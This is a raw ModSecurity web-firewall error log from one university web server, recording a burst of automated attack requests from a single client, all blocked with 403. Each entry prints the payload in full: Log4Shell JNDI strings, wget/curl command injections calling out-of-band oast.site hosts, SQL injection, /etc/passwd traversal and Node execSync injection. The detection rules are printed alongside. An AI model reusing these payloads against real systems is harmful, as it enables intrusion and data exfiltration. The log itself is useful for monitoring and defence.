[Tue Aug 29 11:31:13.315731 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-831}${:-468}.${hostName}.username.cjmn8l5jmimk2adbbnlgeq3h7zpx5xt3h.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/ccmadmin/j_security_check"] [unique_id "ZO10kcCo-f0AAAN@5DMAAAAO"]
[Tue Aug 29 11:31:13.424298 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://0.0.0.0 found within ARGS:url: http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/premise/front/getPingData"] [unique_id "ZO10kcCo-f0AAAP6NMgAAAAQ"]
[Tue Aug 29 11:31:14.343648 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()))))-- - found within ARGS:id: 1' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x207c20,md5(999999999),1,user()))))-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO10ksCo-f0AAAQTKF8AAAA1"]
[Tue Aug 29 11:31:14.531298 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../ found within ARGS:path: /../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php/admin/filemanager/sa/getZipFile"] [unique_id "ZO10ksCo-f0AAAQP65QAAAAx"]
[Tue Aug 29 11:31:15.439419 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:question_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10k8Co-f0AAAPahxQAAAAL"]
[Tue Aug 29 11:31:16.760811 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:del. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:del: 123456 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/cms_channel.php"] [unique_id "ZO10lMCo-f0AAAOM4dsAAAAU"]
[Tue Aug 29 11:31:17.328516 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO10lcCo-f0AAAQQyjoAAAAy"]
[Tue Aug 29 11:31:17.329186 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lcCo-f0AAAOKNvYAAAAK"]
[Tue Aug 29 11:31:17.339857 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO10lcCo-f0AAAO88A0AAAAF"]
[Tue Aug 29 11:31:18.324299 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../ found within ARGS:payload: `ls>../2UdxkOOWwm6uOELSJnJyclAZM5S`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/downloadFlile.cgi"] [unique_id "ZO10lsCo-f0AAAP5mHoAAAAM"]
[Tue Aug 29 11:31:18.381690 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:OFBiz.Visitor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:OFBiz.Visitor: ${jndi:ldap://${:-381}${:-522}.${hostName}.cookie.cjmn8l5jmimk2adbbnlgzwgzdsybf1djo.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/webtools/control/main"] [unique_id "ZO10lsCo-f0AAAQMrpcAAAAu"]
[Tue Aug 29 11:31:20.365530 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:template_path: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-json/lp/v1/courses/archive-course"] [unique_id "ZO10mMCo-f0AAAP@MxoAAAAZ"]
[Tue Aug 29 11:31:22.405363 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: /* found within ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli: id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC [hostname "digilibfeb.unla.ac.id"] [uri "/search/members/"] [unique_id "ZO10msCo-f0AAAPDn6AAAAAP"]
[Tue Aug 29 11:31:23.327158 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:code: a' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO10m8Co-f0AAAQR44kAAAAz"]
[Tue Aug 29 11:31:24.721116 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:yrange. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:yrange: [33:system('wget http:/cjmn8l5jmimk2adbbnlge6uskug9d9jpx.oast.site')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/q"] [unique_id "ZO10nMCo-f0AAAPMmIYAAAAY"]
[Tue Aug 29 11:31:25.475513 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:pingIpAddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:pingIpAddr: ;curl http:/cjmn8l5jmimk2adbbnlg96qu4xtxi9tgg.oast.site -H 'User-Agent: Ri3pKB'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/system_log.cgi"] [unique_id "ZO10ncCo-f0AAAN@5E0AAAAO"]
[Tue Aug 29 11:31:26.726533 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:settings[view options][outputFunctionName]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:settings[view options][outputFunctionName]: x;process.mainModule.require('child_process').execSync('wget http:/cjmn8l5jmimk2adbbnlgfwsfarswwo17e.oast.site');s"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/page"] [unique_id "ZO10nsCo-f0AAAQUH@0AAAA2"]
[Tue Aug 29 11:31:27.334537 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:bsh.script: exec(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/bsh.servlet.BshServlet"] [unique_id "ZO10n8Co-f0AAAQMrqwAAAAu"]
[Tue Aug 29 11:31:27.347452 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:session_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:session_id: ../../../opt/trendmicro/minorityreport/etc/igsa.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/logoff.cgi"] [unique_id "ZO10n8Co-f0AAAQEGIUAAAAm"]
[Tue Aug 29 11:31:29.163063 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../../../etc/passwd\\x5c0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZO10ocCo-f0AAAQOv2IAAAAw"]
[Tue Aug 29 11:31:29.403338 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:opt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:opt: (cat/etc/passwd)>dtoa.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/include/exportUser.php"] [unique_id "ZO10ocCo-f0AAAQR45oAAAAz"]
[Tue Aug 29 11:31:29.502742 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nx_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:nx_id: sleep(6) -- x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO10ocCo-f0AAAQEGIwAAAAm"]
[Tue Aug 29 11:31:29.528715 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'ARHJ'='ARHJ found within ARGS:id: 1' AND (SELECT 9687 FROM (SELECT(SLEEP(6)))pnac) AND 'ARHJ'='ARHJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/suppliers/view_details.php"] [unique_id "ZO10ocCo-f0AAAPahzIAAAAL"]
[Tue Aug 29 11:31:30.376589 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: extractvalue( found within ARGS:uid: 1 and extractvalue(1,concat_ws(1,1,md5(999999999)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/duomiphp/ajax.php"] [unique_id "ZO10osCo-f0AAAO88CMAAAAF"]
[Tue Aug 29 11:31:31.366889 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgnoq546c63i5q5.oast.site`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10o8Co-f0AAAQKOb4AAAAs"]
[Tue Aug 29 11:31:32.331796 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:User. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:User:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10pMCo-f0AAAQOv20AAAAw"]
[Tue Aug 29 11:31:33.579604 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO10pcCo-f0AAAQMrsQAAAAu"]
[Tue Aug 29 11:31:33.680016 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:iface. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:iface: ;curl cjmn8l5jmimk2adbbnlgzk8iekci9ybh9.oast.site/`whoami`;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/ajax/networking/get_netcfg.php"] [unique_id "ZO10pcCo-f0AAAPah0cAAAAL"]
[Tue Aug 29 11:31:34.423283 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param: 1' and updatexml(1,concat(0x7e,(SELECT md5(999999999)),0x7e),1)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/api/sms_check.php"] [unique_id "ZO10psCo-f0AAAQEGKcAAAAm"]
